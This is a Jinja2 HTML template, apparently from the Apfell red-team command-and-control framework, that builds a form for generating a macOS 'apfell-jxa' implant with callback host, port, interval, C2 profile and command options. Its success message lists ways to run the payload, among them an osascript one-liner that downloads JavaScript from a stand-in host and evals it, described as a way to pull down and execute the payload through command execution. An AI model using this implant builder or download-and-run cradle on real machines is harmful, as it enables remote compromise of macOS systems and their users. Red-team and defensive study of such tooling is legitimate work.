{% extends "base.html" %}
{% block body %}
<h1>
    Generate an apfell-jxa payload
</h1>
<form action="" method="post">
    {{ errors.token_errors }}
    <span style="color: red;">{{errors.validate_errors}}</span>
    {{ form.csrf_token }}

    <table>
	<tr>
	    <td> {{form.callback_host.label}} </td>
	    <td> {{form.callback_host(size=64)}} 
		    <br>
		    <span style="color:red;">{{ errors.callback_host_errors }}</span>
	    </td>
	</tr>
        <tr>
	    <td> {{form.callback_port.label}} </td>
	    <td> {{form.callback_port(size=64)}}
		    <br>
    		<span style="color: red;">{{ errors.callback_port_errors }}</span>
	    </td>
	</tr>
        <tr>
	    <td> {{form.obfuscation.label}} </td>
	    <td> {{form.obfuscation(size=10)}} *Coming in future release*
		    <br>
            <span style="color: red;">{{ errors.obfuscation_errors }}</span>
	    </td>
	</tr>
	<tr>
	    <td> {{form.output_directory.label}} </td>
	    <td> {{form.output_directory(size=64)}} (Full Path on server)
		    <br>
            <span style="color: red;">{{ errors.output_directory_errors }}</span>
   	    </td>
	</tr>
	<tr>
	    <td> {{form.callback_interval.label}} </td>
	    <td> {{form.callback_interval(size=10)}} (Seconds)
		    <br>
            <span style="color: red;">{{ errors.callback_interval_errors }}</span>
	    </td>
	</tr>
	<tr>
	    <td> {{form.default_tag.label}} </td>
	    <td> {{form.default_tag(size=32)}}
		    <br>
   		    <span style="color: red;">{{ errors.default_tag_errors }}</span>
	    </td>
	</tr>
	<tr>
	    <td> {{form.c2_profile.label}} </td>
	    <td> {{form.c2_profile()}}
		    <br>
            <span style="color: red;">{{ errors.c2_profile_errors }}</span>
	    </td>
	</tr>
	<tr>
		<td>
			{{form.commands.label}}
		</td>
		<td>
			{{form.commands(size=30)}}
			<br>
			<span style="color: red;">{{ errors.command_errors}}</span>
		</td>
	</tr>
	<tr>
	    <td> {{form.submit()}} </td>
	    <td></td>
	</tr>
    </table>
</form>
{% if success %}
<p>
    Successfully created payload with UUID: {{errors.uuid}}.<br>
    This payload can be executed as follows:<br>
    <ul>
    <li>
        <strong>osascript -l JavaScript {{form.output_directory.data}}</strong>
    </li>
    <li>
        <strong>osascript {{form.output_directory.data}}</strong>
    </li>
    <li>
        <strong>osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('HTTP://HOST_YOUR_FILE/FILE_NAME')),$.NSUTF8StringEncoding)));"</strong>
        <ul><li>You need to host the file first though! Then you can use the above with some form of command execute to pull down and execute the payload.</li></ul>
    </li>
</ul>
</p>
{% endif %}
{% endblock %}

{% block scripts %}
{% endblock %}
